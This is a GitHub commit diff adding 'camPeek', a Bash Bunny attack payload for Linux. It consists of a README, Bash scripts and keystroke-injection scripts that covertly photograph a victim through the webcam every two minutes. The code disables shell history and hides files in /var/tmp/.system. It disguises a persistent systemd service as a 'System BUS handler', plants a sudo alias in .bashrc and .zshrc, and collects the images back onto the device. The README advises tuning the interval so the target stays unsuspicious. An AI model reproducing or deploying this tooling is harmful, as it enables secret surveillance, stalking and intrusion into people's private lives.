uploading payload
drapl0n
GitHub
parent
6a0d5e83fd
commit
8f2f2f94f5
|
|
@ -0,0 +1,55 @@
|
|||
## About:
|
||||
* Title: camPeek
|
||||
* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Execution
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny.
|
||||
|
||||
### Features:
|
||||
* Robust Payload for capturing targets images.
|
||||
* No additional dependencies required.
|
||||
* Persistent.
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Payload:
|
||||
* Payload is divided into two modules:
|
||||
1) Deployment: In this stage payload is deployed in targets system.
|
||||
2) Exfiltration: Storing saved loot from targets system in bunny.
|
||||
|
||||
### Payload Script's Workflow:
|
||||
* Stop storing histroy.
|
||||
* Grep bunny's mount point of bunny.
|
||||
* Creating hidden directory in /var/tmp/..... for obfuscation.
|
||||
* Copying ffmpeg and image capturing mechanism in target's system.
|
||||
* Creating systemd service for persistance and triggering mechanism for autostart.
|
||||
|
||||
### Changes to be made:
|
||||
* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Note:
|
||||
* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory.
|
||||
* Due to big size of binary, it is not provided in this repo.
|
||||
* Craete directory name `camPeek` in `/loot/` for storing captured images.
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| -------------- | ----------------------------- |
|
||||
| switch1/payload.txt | /payloads/switch1/ |
|
||||
| switch2/payload.txt | /payloads/switch2/ |
|
||||
| camPeek/ | /payloads/libray/ |
|
||||
|
||||
### Usage:
|
||||
1. Deploy first payload during absence of target using `switch1`.
|
||||
2. Execute second payload during absence of target to store captured images in bunny using `switch2`.
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir /var/tmp/.system
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/payloads/library/camPeek/ffmpeg /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/ffmpeg
|
||||
mkdir /var/tmp/.system/sysLog
|
||||
cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
cp -r $mntt/payloads/library/camPeek/shell /tmp/
|
||||
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
#!/bin/bash
|
||||
ls -a ~/ | grep 'zshrc' &> /dev/null
|
||||
if [ $? = 0 ]; then
|
||||
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
|
||||
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
|
||||
fi
|
||||
|
||||
ls -a ~/ | grep 'bashrc' &> /dev/null
|
||||
if [ $? = 0 ]; then
|
||||
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
|
||||
echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
|
||||
fi
|
||||
|
|
@ -0,0 +1,5 @@
|
|||
while true;
|
||||
do
|
||||
/var/tmp/.system/./ffmpeg -f video4linux2 -i /dev/video0 -vframes 1 -video_size 640x480 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
|
||||
sleep 120
|
||||
done
|
||||
|
|
@ -0,0 +1,56 @@
|
|||
# Title: camPeek
|
||||
# Description: camPeek payload peeks through targets web cam and capture images.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: GNU/Linux operating systems with systemd.
|
||||
# Attackmodes: HID, Storage.
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 12000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
# Title: camPeek
|
||||
# Description: camPeek payload's exfilteration module to move captured images to bunny.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: GNU/Linux operating systems with systemd.
|
||||
# Attackmodes: HID, Storage.
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
# create directory named camPeek in /loot/
|
||||
Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \&
|
||||
Q ENTER
|
||||
Q STRING disown \&\& exit
|
||||
Q ENTER
|
||||
Loading…
Reference in New Issue